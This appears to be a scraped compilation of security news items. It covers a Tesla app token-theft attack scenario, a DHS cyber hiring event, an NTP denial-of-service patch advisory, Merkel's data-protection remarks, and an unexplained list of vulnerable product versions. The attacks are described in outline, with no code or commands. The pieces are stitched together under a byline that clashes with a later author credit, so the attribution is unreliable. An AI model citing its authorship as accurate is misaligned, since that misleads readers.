Anna Colins

Researchers at Norway-based security firm Promon have demonstrated how thieves with the necessary hacking skills can track and steal Tesla vehicles through the carmaker’s Android application.

In a video released this week, experts showed how they could obtain the targeted user’s credentials and leverage the information to track the vehicle and drive it away. There are several conditions that need to be met for this attack and the victim must be tricked into installing a malicious app on their mobile phone, but the researchers believe their scenario is plausible.

According to Promon, the Tesla mobile app uses HTTP requests and an OAuth token to communicate with the Tesla server. The token is valid for 90 days and it allows users to authenticate without having to enter their username and password every time they launch the app.

The problem is that this token is stored in cleartext in the app’s sandbox folder, allowing a remote attacker with access to the device to steal the data and use it to send specially crafted requests to the server. Once they obtain this token, criminals can use it to locate the car and open its doors. In order to enable the keyless driving feature and actually steal the vehicle, they need to obtain the victim’s username and password as well.

Experts believe this can be achieved by tricking the user into installing a piece of malware that modifies the Tesla app and steals the username and password when the victim enters them in the app. According to researchers, the legitimate Tesla app can be modified using one of the many vulnerabilities affecting Android, such as the issue known as TowelRoot. The TowelRoot exploit, which allows attackers to elevate privileges to root, has been used by an Android malware dubbed Godless.

In order to get the victim to install the malicious app, the attacker can use various methods, including free Wi-Fi hotspots.

“When the Tesla owner connects to the Wi-Fi hotspot and visits a web page, he is redirected to a captive portal that displays an advertisement targeting Tesla owners. In [our] example, an app was advertised that offers the Tesla owner a free meal at the nearby restaurant. When the Tesla owner then clicks on the advertisement, he is redirected to the Google Play store where the malicious app is displayed,” experts said.

While there are multiple conditions that need to be met for the attack to work, researchers pointed out that many devices run vulnerable versions of Android and users are often tricked into installing malware onto their devices.

Promon has not disclosed any technical details about the attack method. The company says it has been working with Tesla on addressing the issues. It’s worth noting that Tesla has a bug bounty program with a maximum payout of $ 10,000 for each flaw found in its websites, mobile apps and vehicle hardware.

This is not the first time researchers have demonstrated that Tesla cars can be hacked remotely. A few weeks ago, experts at China-based tech company Tencent showed that they could remotely control an unmodified Tesla Model S while it was parked or on the move. Tesla quickly patched the vulnerabilities found by Tencent, but downplayed their severity, claiming that the attack was not fully remote, as suggested in a video released by experts.

SecurityWeek has reached out to Tesla for comment and will update this article if the company responds.

view counter

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed

The cybersecurity skills shortage has been discussed in many different ways over the recent years, but a successful hiring event held by the Department of Homeland Security has some wondering if that event was a sign of optimism or an outlier.

The Department of Homeland Security (DHS) held a two-day hiring event "aimed at filling mission-critical positions to protect our Nation's cyberspace" in July. According to a new blog post, that event garnered "over 14,000 applicants and over 2,000 walk-ins" and culminated with more than 800 candidate interviews and "close to 150 tentative job offers."

Angela Bailey, chief human capital officer for the DHS, said in a blog post that the DHS "set out to dispel certain myths regarding cybersecurity hiring," including the ideas that there is a cybersecurity skills shortage and that organizations cannot hire people "on the spot."

"While not all of them were qualified, we continue to this day to hire from the wealth of talent made available as a result of our hiring event," Bailey wrote. "We demonstrated that by having our hiring managers, HR specialists, and personnel security specialists together, we were able to make about 150 job offers within two days. Close to 430 job offers have been made in total, with an original goal of filling around 350 positions."

Gunter Ollmann, CSO for Vectra Networks, said although the event "was pitched under the banner of cybersecurity it is not clear what types of jobs were actually being filled," and some positions sounded more "like IT roles with an impact on cybersecurity, rather than cybersecurity specific or even experienced infosec roles."

"Everyone with a newly minted computer science degree is being encouraged to get in to cybersecurity, as the lack of candidates is driving up salaries," Ollmann told SearchSecurity. "Government jobs have always been popular with recent graduates that managed to scrape through their education, but would unlikely appear on the radar as interns for larger commercial organizations or research-led businesses."

Chris Sullivan, CISO and CTO for Core Security, agreed that the DHS event may not be indicative of the state of the cybersecurity skills shortage.

"It looks like DHS executed well and had a successful event but we shouldn't interpret that as a sign that cyber-defender resource problems are over. In fact, every CISO that I speak to has not seen any easing in the availability or cost of experienced resources," Sullivan said. "In addition, the medium to long term solution requires both formal and on the job training -- college curriculum is coming but much of it remains immature. We need resources to train the trainers."

Derek Manky, global security strategist at Fortinet, warned about putting too much into just a few hundred positions compared to the potentially hundreds of thousands of cybersecurity jobs left unfilled.

"The DHS numbers are relatively small compared with the overall number of unfilled positions," Manky said. "Part of the solution is to build better technology that requires less human capital to be effective and can evolve to meet shifts in the threat landscape. Additionally, the market needs to better define what skills a cybersecurity professional should hold and use these definitions to focus on efforts that can engage and develop a new generation of cybersecurity talent."

Rob Sadowski, director of marketing at RSA, the Security Division of EMC, said this event might be cause for optimism regarding the cybersecurity skills shortage.

"The experience that DHS shared is encouraging because it shows a groundswell of interest in cybersecurity careers. This interest and enthusiasm needs to continue across the public and private sector if we are to address the still significant gap in cybersecurity talent that is required in today's advanced threat world," Sadowski told SearchSecurity before hedging his bet. "The talent pool in an area such as DC, where many individuals have strong backgrounds in defense or intelligence, security clearances, and public sector agency experience contributes significantly towards building a pool of qualified cybersecurity candidates that may not be present in other parts of the country or the world."

Bailey attributed some of the success of the DHS event to proper planning and preparation.

"Before the event, we carefully evaluated the security clearance requirements for the open positions. We identified many positions that could be performed fully with a 'Secret' rather than a 'Top Secret' clearance to broaden our potential applicant pool," Bailey wrote. "We knew that all too often the security process is where we've lost excellent candidates. By beginning the paperwork at the hiring event, we eliminated one of the more daunting steps and helped the candidates become more invested in the process."

Bailey noted the most important advice in hiring was to not let bureaucracy get in the way.

"The most important lesson learned from our experience is the value of acting collaboratively, quickly, and decisively. My best advice is to just do it," Bailey wrote. "Don't spend your precious time deliberating over potential barriers or complications; stop asking Congress for yet another hiring authority or new personnel system, instead capitalize on the existing rules, regulations and hiring authorities available today."

Sadowski said rapid action is a cornerstone of an effective security program, but noted not all organizations may have that option.

"It's great that DHS has the luxury to act decisively in hiring, especially from what they saw as a large, qualified pool," Sadowski said. "However, many private sector organizations may not have this freedom, where qualified potential hires may require significant commitment, investment, and training so that they understand how security impacts that particular business, and how to best leverage the technology that is in place."

Next Steps

Learn more about how the cybersecurity skills shortage be fixed.

Find out how to live with the cybersecurity skills shortages.

Get info on why there is a delay in adopting new tech because of the skills shortage.


SearchSecurity: Security Wire Daily News

The Network Time Foundation's Network Time Protocol Project has patched multiple denial-of-service vulnerabilities with the release of ntp-4.2.8p9. The last update to the open source protocol used to synchronize computer clocks was in June.  

"NTP users are strongly urged to take immediate action to ensure that their NTP daemons are not susceptible to being used in DDoS (distributed denial-of-service) attacks," the project maintainers wrote in the security advisory.

[ Also on InfoWorld: 19 open source GitHub projects for security pros. | Discover how to secure your systems with InfoWorld's Security Report newsletter. ]

NTP is a widely used protocol, and has been hijacked several times over the past two years in distributed denial-of-service attacks. Attackers harness the power of the servers running NTP and amplify the amount of traffic -- as much as 1,000 times the size of the initial query -- sent to victim systems. Research from network security company Arbor Networks estimated that 85 percent of volumetric DDoS attacks exceeding 100Gbps in size were NTP reflection attacks.

Some of the vulnerabilities are easy to exploit, and there is a proof of concept already available for one of them. Attackers are increasingly exploiting the limitations of older protocols like NTP to generate large volumes of junk traffic used for large DDoS attacks, network company Akamai said in a previous State of the Internet report.

Issues fixed in ntp-4.2.8p9

The most serious vulnerability lets attackers crash Windows systems by sending "too big" packets (CVE-2016-9312). The update also includes fixes for two medium, two medium-low, and five low-severity vulnerabilities, all of which can be exploited to cause a denial of service. One of the medium-severity flaws (CVE-2016-7431) was related to a regression in the handling of some Zero Origin timestamp checks. One of the low-severity flaws (CVE-2016-7433) was related to a previously fixed bug where the jitter value was higher than expected and affected initial sync calculations.

Two vulnerabilities were related to the trap service in NTPD. While trap is not enabled by default, if the service is explicitly enabled, attackers can send specially crafted packets to cause a null pointer dereference (CVE-2016-9311) that will crash NTPD. The configuration modification vulnerability in the control mode (mode 6) functionality of NTPD (CVE-2016-9310) can be exploited by a remote, unauthenticated attacker.

"If, against long-standing BCP recommendations, restrict default noquery is not specified, a specially crafted control mode packet can set NTPD traps, providing information disclosure and DDoS amplification, and unset NTPD traps, disabling legitimate monitoring," according to the advisory.

Two of the low-severity vulnerabilities exploited NTP's broadcast mode. They were originally intended to be used only on trusted networks, but now attackers with access to the broadcast service can abuse the replay prevention functionality (CVE-2016-7427) and the poll interval enforcement functionality (CVE-2016-7428) to cause NTPD to reject broadcast mode packets from legitimate NTP broadcast servers.

If NTPD is configured to allow mrulist query requests, a server sending malicious mrulist queries will crash NTPD (CVE-2016-7434). The researcher who reported this vulnerability, Magnus Stubman, has publicly released the proof of concept, likely because the low-severity vulnerability, with a score of 3.8 on the Common Vulnerability Scoring System, is highly exploitable.

"The vulnerability allows unauthenticated users to crash NTPD with a single malformed UDP packet, which causes a null pointer dereference," Stubman wrote.

If the server response on a socket corresponds to a different interface than what was used for the request, NTPD updates the peer structure to use the newer interface. On hosts with multiple interfaces in separate networks and where the operating system isn't checking the packet's source IP address, attackers can send a packet with spoofed source addresses to trick NTPD to select the wrong interface (CVE-2016-7429). Repeating the attack even once per second is enough to prevent NTPD from synchronizing with the time server.

Rate limiting prevents brute-force attacks on the origin timestamp, but if the server is misconfigured, it can be abused in a DDoS attack. Attackers can send packets with spoofed source addresses and keep the rate limiting activated, which would prevent NTPD from accepting valid responses from other sources (CVE-2016-7426).

Mitigations and recommendations

Along with updating to ntp-4.2.8p9, the project maintainers recommended implementing Ingress and Egress filtering through BCP-38 to "defeat denial-of-service attacks." Many DoS attacks rely on IP source address spoofing to hide the packet's point of origin, making it hard for defenders to know where the network traffic is coming from. BCP-38 filtering lets administrators block IP packets that have forged IP addresses. If the device is not allowed to send packets with source addresses other than its own, then that device can't be hijacked to spew junk traffic as part of a DDoS attack.

Other recommendations included:

  • Monitoring NTPD instances and autorestarting the daemon without the -g flag if it stops running
  • Using restrict default noquery in the ntp.conf file to allow only mode-six queries from trusted networks and hosts
  • Using broadcast mode only on trusted networks
  • Creating a firewall rull to block oversized NTP packets, especially on Windows
  • Allowing mrulist query packets only from trusted hosts
  • Configuring the firewall to control what interfaces can receive packets from which networks, especially if the operating system isn't performing source address checks
  • Configuring rate limited with restrict source in the ntp.conf file, instead of restrict default limited

The Department of Homeland Security's Computer Emergency Response Team at Carnegie Mellon University's Software Engineering Institute maintain a list of vendors implementing NTP. At the moment, the status of most vendors is listed as "Unknown."

Update or replace?

Whenever there is a security vulnerability in a widely used open source project, a segment of IT and security folks pounce on the report as proof people should abandon using the software and switch to something else. NTP is no different, as the 30-year-old protocol lacks security features and is vulnerable to abuse. There are many who think administrators should use secure alternatives, but most tend to be complex or not yet mature enough for widespread adoption.

The "don't update, replace," argument is impractical. Replacing crucial services without thinking through how the new tool would be supported causes more administrative headaches. It may be a simple enough task to uninstall NTPD, but if administrators don't know how to configure the new tool correctly, monitor the performance, and troubleshoot resulting issues, then the replacement tool doesn't do much to improve overall security. Any replacement should come after a thorough review of the alternatives, be tested thoroughly in a nonproduction environment, and have controls to monitor and secure the software. Don't replace; update instead.

To comment on this article and other InfoWorld content, visit InfoWorld's LinkedIn page, Facebook page and Twitter stream.


InfoWorld Security

EU countries must not be too restrictive in how they apply EU data protection laws or risk damaging the development of big data projects, German chancellor Angela Merkel has said.

Germany has traditionally been cautious over data collection, but if countries are too restrictive then "big data management will not be possible", Merkel told the 10th IT Summit (link to video in German) in Saarbrücken.

Europeans are famous for banning things, Merkel said. These bans are put in place for good reason, she said, but can be damaging if taken to excess.

"In Germany we have the principle of 'data minimisation', but we may have to give a little on that. Such a principle doesn't seem as appropriate when you are looking at big data," she said.

While it is important to protect personal data, it is also important to enable new developments, she said.

"Courts will have to be careful not to be too strict if that means limiting opportunities", Merkel said.

Munich-based data protection expert Kirsten Wolgast of Pinsent Masons, the law firm behind Out-Law.com said Merkel's comments suggest a change of direction.

"Merkel obviously wants to create some space for big data business models, and make it a bit easier to establish. But we'll have to wait and see whether the data protection authorities or courts take her comments into account," Wolgast said.

Berlin data protection commissioner Maja Smoltczyk said this month that nine of the country's federal data protection authorities are to conduct a review of 500 businesses' data transfer arrangements.

The review will focus on arrangements the businesses have in place for transferring personal data outside of the European Economic Area (EEA).

Copyright © 2016, Out-Law.com

Out-Law.com is part of international law firm Pinsent Masons.

Sponsored: Customer Identity and Access Management


The Register - Security

Vulnerable: Oracle VM VirtualBox 5.0.26
Oracle VM VirtualBox 5.0.22
Oracle VM VirtualBox 5.0.16
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0.9
Oracle VM VirtualBox 5.0.8
Oracle VM VirtualBox 5.0.18
Oracle VM VirtualBox 5.0
Oracle Mysql 5.7.15
Oracle Mysql 5.7.14
Oracle Mysql 5.7.13
Oracle Mysql 5.7.12
Oracle Mysql 5.7.9
Oracle Mysql 5.7.8
Oracle Mysql 5.7.7
Oracle Mysql 5.7.6
Oracle Mysql 5.7.5
Oracle Mysql 5.7.4
Oracle Mysql 5.7.3
Oracle Mysql 5.7.2
Oracle Mysql 5.6.33
Oracle Mysql 5.6.32
Oracle Mysql 5.6.31
Oracle Mysql 5.6.30
Oracle Mysql 5.6.28
Oracle Mysql 5.6.27
Oracle Mysql 5.6.26
Oracle Mysql 5.6.25
Oracle Mysql 5.6.24
Oracle Mysql 5.6.23
Oracle Mysql 5.6.22
Oracle Mysql 5.6.21
Oracle Mysql 5.6.17
Oracle Mysql 5.6.12
Oracle Mysql 5.6.11
Oracle Mysql 5.6.10
Oracle Mysql 5.6.9
Oracle Mysql 5.6.6
Oracle Mysql 5.6
Oracle Mysql 5.7.11
Oracle Mysql 5.7.10
Oracle Mysql 5.6.8
Oracle Mysql 5.6.7
Oracle Mysql 5.6.5
Oracle Mysql 5.6.4
Oracle Mysql 5.6.29
Oracle Mysql 5.6.20
Oracle Mysql 5.6.2
Oracle Mysql 5.6.19
Oracle Mysql 5.6.18
Oracle Mysql 5.6.16
Oracle Mysql 5.6.15
Oracle Mysql 5.6.14
Oracle Mysql 5.6.13
Oracle Enterprise Linux 5
OpenSSL Project OpenSSL 1.0.0h 0
OpenSSL Project OpenSSL 0.9.8u 0
OpenSSL Project OpenSSL 1.0.11
OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0
OpenSSL Project OpenSSL 0.9.8 k
OpenSSL Project OpenSSL 0.9.8 j
OpenSSL Project OpenSSL 0.9.8 i
OpenSSL Project OpenSSL 0.9.8 h
OpenSSL Project OpenSSL 0.9.8 e
OpenSSL Project OpenSSL 0.9.8 d
OpenSSL Project OpenSSL 0.9.8 c
OpenSSL Project OpenSSL 0.9.8 b
OpenSSL Project OpenSSL 0.9.8 a
OpenSSL Project OpenSSL 0.9.8
+ Gentoo Linux
OpenSSL Project OpenSSL 0.9.7 m
OpenSSL Project OpenSSL 0.9.7 l
OpenSSL Project OpenSSL 0.9.7 k
OpenSSL Project OpenSSL 0.9.7 j
OpenSSL Project OpenSSL 0.9.7 i
OpenSSL Project OpenSSL 0.9.7 h
OpenSSL Project OpenSSL 0.9.7 g
OpenSSL Project OpenSSL 0.9.7 f
OpenSSL Project OpenSSL 0.9.7 e
OpenSSL Project OpenSSL 0.9.7 d
OpenSSL Project OpenSSL 0.9.7 c
OpenSSL Project OpenSSL 0.9.7 b
OpenSSL Project OpenSSL 0.9.7 a
+ OpenPKG OpenPKG Current
OpenSSL Project OpenSSL 0.9.7
OpenSSL Project OpenSSL 0.9.6 m
OpenSSL Project OpenSSL 0.9.6 l
OpenSSL Project OpenSSL 0.9.6 k
OpenSSL Project OpenSSL 0.9.6 j
OpenSSL Project OpenSSL 0.9.6 i
OpenSSL Project OpenSSL 0.9.6 h
OpenSSL Project OpenSSL 0.9.6 g
OpenSSL Project OpenSSL 0.9.6 f
OpenSSL Project OpenSSL 0.9.6 e
OpenSSL Project OpenSSL 0.9.6 d
+ Slackware Linux 8.1
OpenSSL Project OpenSSL 0.9.6 c
OpenSSL Project OpenSSL 0.9.6 b
OpenSSL Project OpenSSL 0.9.6 a
+ NetBSD NetBSD 1.5.3
+ NetBSD NetBSD 1.5.2
+ NetBSD NetBSD 1.5.1
+ NetBSD NetBSD 1.5
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
OpenSSL Project OpenSSL 0.9.6
OpenSSL Project OpenSSL 0.9.5
OpenSSL Project OpenSSL 0.9.4
OpenSSL Project OpenSSL 0.9.3
OpenSSL Project OpenSSL 0.9.2 b
OpenSSL Project OpenSSL 0.9.1 c
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1t
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1
OpenSSL Project OpenSSL 1.0.0x
OpenSSL Project OpenSSL 1.0.0t
OpenSSL Project OpenSSL 1.0.0s
OpenSSL Project OpenSSL 1.0.0r
OpenSSL Project OpenSSL 1.0.0q
OpenSSL Project OpenSSL 1.0.0p
OpenSSL Project OpenSSL 1.0.0o
OpenSSL Project OpenSSL 1.0.0n
OpenSSL Project OpenSSL 1.0.0m
OpenSSL Project OpenSSL 1.0.0L
OpenSSL Project OpenSSL 1.0.0k
OpenSSL Project OpenSSL 1.0.0j
OpenSSL Project OpenSSL 1.0.0i
OpenSSL Project OpenSSL 1.0.0g
OpenSSL Project OpenSSL 1.0.0f
OpenSSL Project OpenSSL 1.0.0e
OpenSSL Project OpenSSL 1.0.0d
OpenSSL Project OpenSSL 1.0.0c
OpenSSL Project OpenSSL 1.0.0b
OpenSSL Project OpenSSL 1.0.0a
OpenSSL Project OpenSSL 0.9.8zh
OpenSSL Project OpenSSL 0.9.8zg
OpenSSL Project OpenSSL 0.9.8zf
OpenSSL Project OpenSSL 0.9.8ze
OpenSSL Project OpenSSL 0.9.8zd
OpenSSL Project OpenSSL 0.9.8zc
OpenSSL Project OpenSSL 0.9.8zb
OpenSSL Project OpenSSL 0.9.8za
OpenSSL Project OpenSSL 0.9.8y
OpenSSL Project OpenSSL 0.9.8X
OpenSSL Project OpenSSL 0.9.8w
OpenSSL Project OpenSSL 0.9.8t
OpenSSL Project OpenSSL 0.9.8s
OpenSSL Project OpenSSL 0.9.8R
OpenSSL Project OpenSSL 0.9.8Q
OpenSSL Project OpenSSL 0.9.8p
OpenSSL Project OpenSSL 0.9.8o
OpenSSL Project OpenSSL 0.9.8n
OpenSSL Project OpenSSL 0.9.8m
OpenSSL Project OpenSSL 0.9.8l
OpenSSL Project OpenSSL 0.9.8g
OpenSSL Project OpenSSL 0.9.8f
OpenSSL Project OpenSSL 0.9.8.
OpenSSL Project OpenSSL 0.9.8 f
OpenSSL Project OpenSSL 0.9.8v
IBM Sterling Connect:Express for UNIX 1.5.0.9
IBM Sterling Connect:Express for UNIX 1.5.0.13
IBM Sterling Connect:Express for UNIX 1.5.0.12
IBM Sterling Connect:Express for UNIX 1.5.0.11
IBM Sterling Connect:Express for UNIX 1.5.0
IBM Sterling Connect:Express for UNIX 1.4.6
IBM Sterling Connect:Express for UNIX 1.4
IBM SDK for Node.js 6.6.0.0
IBM SDK for Node.js 6.2.0.0
IBM SDK for Node.js 6.1.0.0
IBM SDK for Node.js 6.0.0.0
IBM SDK for Node.js 4.5.0.0
IBM SDK for Node.js 4.4.6.0
IBM SDK for Node.js 4.4.5.0
IBM SDK for Node.js 4.4.4.0
IBM SDK for Node.js 4.4.3.0
IBM SDK for Node.js 4.4.2.0
IBM SDK for Node.js 4.4.1.0
IBM SDK for Node.js 4.4.0.0
IBM SDK for Node.js 4.3.2.0
IBM SDK for Node.js 4.3.1.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.2.0.14
IBM SDK for Node.js 1.2.0.13
IBM SDK for Node.js 1.2.0.12
IBM SDK for Node.js 1.2.0.11
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.2.0.1
IBM SDK for Node.js 1.1.1.3
IBM SDK for Node.js 1.1.1.2
IBM SDK for Node.js 1.1.1.1
IBM SDK for Node.js 1.1.1.0
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.21
IBM SDK for Node.js 1.1.0.20
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM SDK for Node.js 1.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM BigFix Remote Control 9.1.2
Cisco Wide Area Application Services (WAAS) 0
Cisco WebEx Node for MCS 0
Cisco WebEx Meetings Server - SSL Gateway 0
Cisco WebEx Meetings Server - Multimedia Platform (MMP) 0
Cisco WebEx Meetings Server 2.0
Cisco WebEx Meetings Server 1.0
Cisco WebEx Meetings for Windows Phone 8 0
Cisco WebEx Meetings for BlackBerry 0
Cisco WebEx Meetings for Android 0
Cisco WebEx Meetings Client - On-Premises 0
Cisco WebEx Meetings Client - Hosted 0
Cisco WebEx Meeting Center 0
Cisco WebEx Business Suite 0
Cisco Web Security Appliance (WSA) 0
Cisco Visual Quality Experience Tools Server 0
Cisco Visual Quality Experience Server 0
Cisco Virtualization Experience Media Edition 0
Cisco Virtual Security Gateway for Microsoft Hyper-V 0
Cisco Virtual Security Gateway 0
Cisco Videoscape Control Suite 0
Cisco Videoscape AnyRes Live 0
Cisco Video Surveillance PTZ IP Cameras 0
Cisco Video Surveillance Media Server 0
Cisco Video Surveillance 7000 Series IP Cameras 0
Cisco Video Surveillance 6000 Series IP Cameras 0
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 0
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 0
Cisco Video Surveillance 3000 Series IP Cameras 0
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 0
Cisco Universal Small Cell Iuh 0
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 2.99.4
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 0
Cisco Universal Small Cell 7000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 0
Cisco Unity Express 0
Cisco Unity Connection 0
Cisco Unified Workforce Optimization - Quality Management Solution 0
Cisco Unified Workforce Optimization 0
Cisco Unified Wireless IP Phone 0
Cisco Unified SIP Proxy Software 0
Cisco Unified SIP Proxy 0
Cisco Unified MeetingPlace 0
Cisco Unified IP 9971 Phone 0
Cisco Unified IP 9951 Phone 0
Cisco Unified IP 8961 Phone 0
Cisco Unified IP 8945 Phone 0
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 0
Cisco Unified IP 8831 Conference Phone 0
Cisco Unified IP 7900 Series Phones 0
Cisco Unified IP 6945 Phone 0
Cisco Unified IP 6901 Phone 0
Cisco Unified Intelligent Contact Management Enterprise 0
Cisco Unified Intelligence Center 0
Cisco Unified Contact Center Express 0
Cisco Unified Contact Center Enterprise - Live Data server 0
Cisco Unified Contact Center Enterprise 0
Cisco Unified Communications Manager Session Management Edition 0
Cisco Unified Communications Manager IM & Presence Service (formerly C 0
Cisco Unified Communications Manager (CUCM) 0
Cisco Unified Communications Domain Manager 0
Cisco Unified Attendant Console Standard 0
Cisco Unified Attendant Console Premium Edition 0
Cisco Unified Attendant Console Enterprise Edition 0
Cisco Unified Attendant Console Department Edition 0
Cisco Unified Attendant Console Business Edition 0
Cisco Unified Attendant Console Advanced 0
Cisco Unified Attendant Console 0
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 0
Cisco UCS Manager 0
Cisco UCS Director 0
Cisco UCS Central Software 0
Cisco UCS B-Series Blade Servers 0
Cisco UCS 6200 Series and 6300 Series Fabric Interconnects 0
Cisco UC Integration for Microsoft Lync 0
Cisco TelePresence Video Communication Server (VCS) 0
Cisco TelePresence TX9000 Series 0
Cisco TelePresence System TX1310 0
Cisco TelePresence System EX Series 0
Cisco TelePresence System 500-37 0
Cisco TelePresence System 500-32 0
Cisco TelePresence System 3000 Series 0
Cisco Telepresence System 3000 0
Cisco TelePresence System 1300 0
Cisco TelePresence System 1100 0
Cisco TelePresence System 1000 0
Cisco TelePresence System TX9000
Cisco TelePresence System 500-37
Cisco TelePresence System 500-32
Cisco TelePresence System 1100
Cisco TelePresence SX Series 0
Cisco TelePresence Supervisor MSE 8050 0
Cisco TelePresence Server on Virtual Machine 0
Cisco TelePresence Server on Multiparty Media 820 0
Cisco TelePresence Server on Multiparty Media 310 and 320 0
Cisco TelePresence Server 7010 and MSE 8710 0
Cisco TelePresence Serial Gateway Series 0
Cisco TelePresence Profile Series 0
Cisco TelePresence MX Series 0
Cisco TelePresence MCU 0
Cisco TelePresence ISDN Link 0
Cisco TelePresence ISDN Gateway MSE 8321 0
Cisco TelePresence ISDN Gateway 3241 0
Cisco TelePresence Integrator C Series 0
Cisco TelePresence Content Server 0
Cisco TelePresence Conductor 0
Cisco TAPI Service Provider (TSP) 0
Cisco Tandberg Codian MSE 8320 0
Cisco Tandberg Codian ISDN Gateway 0
Cisco StealthWatch UDP Director (formerly Flow Replicator) 0
Cisco StealthWatch UDP Director 0
Cisco StealthWatch Management Console (SMC) 0
Cisco StealthWatch IDentity 0
Cisco StealthWatch FlowCollector sFlow 0
Cisco StealthWatch FlowCollector NetFlow 0
Cisco SPA525G 5-Line IP Phone 0
Cisco SPA51x IP Phones 0
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 0
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 0
Cisco SPA112 2-Port Phone Adapter 0
Cisco SocialMiner 0
Cisco Smart Net Total Care - Local Collector appliance 0
Cisco Smart Care 0
Cisco Small Business SPA500 Series IP Phones 0
Cisco Small Business SPA300 Series IP Phones 0
Cisco Small Business 300 Series (Sx300) Managed Switches 0
Cisco Small Business 300 Series 0
Cisco Show and Share 0
Cisco Services Provisioning Platform 0
Cisco Security Manager 0
Cisco Secure Access Control System (ACS) 0
Cisco Registered Envelope Service 0
Cisco Proactive Network Operations Center 0
Cisco Prime Performance Manager 0
Cisco Prime Optical for Service Providers 0
Cisco Prime Optical 0
Cisco Prime Network Services Controller 0
Cisco Prime Network 0
Cisco Prime License Manager 0
Cisco Prime LAN Management Solution 0
Cisco Prime IP Express 0
Cisco Prime Infrastructure Plug and Play Standalone Gateway 0
Cisco Prime Data Center Network Manager -
Cisco Prime Collaboration Provisioning 0
Cisco Prime Collaboration Deployment 0
Cisco Prime Collaboration Assurance 0
Cisco Prime Access Registrar 0
Cisco Physical Access Gateways 0
Cisco Partner Support Service 1.0
Cisco Paging Server (Informacast) 0
Cisco Paging Server 0
Cisco Packaged Contact Center Enterprise 0
Cisco ONS 15454 Series Multiservice Provisioning Platforms 0
Cisco OnePK All-in-One VM 0
Cisco onePK All-in-One Virtual Machine 0
Cisco One Portal 0
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 0
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 0
Cisco Nexus 6000 Series Switches 0
Cisco Nexus 5000 Series Switches 0
Cisco Nexus 4000 Series Blade Switches 0
Cisco Nexus 3000 Series Switches 0
Cisco Nexus 1000V Series Switches 0
Cisco Nexus 1000V InterCloud for VMware 0
Cisco Nexus 1000V InterCloud 0
Cisco Network Performance Analysis 0
Cisco Network Analysis Module 0
Cisco NetFlow Generation Appliance 0
Cisco NAC Guest Server 0
Cisco NAC Appliance - Clean Access Server 0
Cisco NAC Appliance - Clean Access Manager 0
Cisco MXE 3500 Series Media Experience Engines 0
Cisco Multicast Manager 0
Cisco Mobility Services Engine 0
Cisco MediaSense 0
Cisco Media Services Interface 0
Cisco MDS 9000 Series Multilayer Switches 0
Cisco Management Appliance 0
Cisco Lancope Stealthwatch FlowCollector sFlow 0
Cisco Lancope Stealthwatch FlowCollector NetFlow 0
Cisco Jabber Software Development Kit 0
Cisco Jabber Guest 0
Cisco Jabber for Windows 0
Cisco Jabber for Mac 0
Cisco Jabber for iPhone and iPad 0
Cisco Jabber for Android 0
Cisco Jabber Client Framework (JCF) Components 0
Cisco Jabber 0
Cisco IronPort Email Security Appliance 0
Cisco IP Interoperability and Collaboration System (IPICS) 0
Cisco IP 8800 Series Phones - VPN feature 0
Cisco IP 7800 Series Phones 0
Cisco IOS XR Software 0
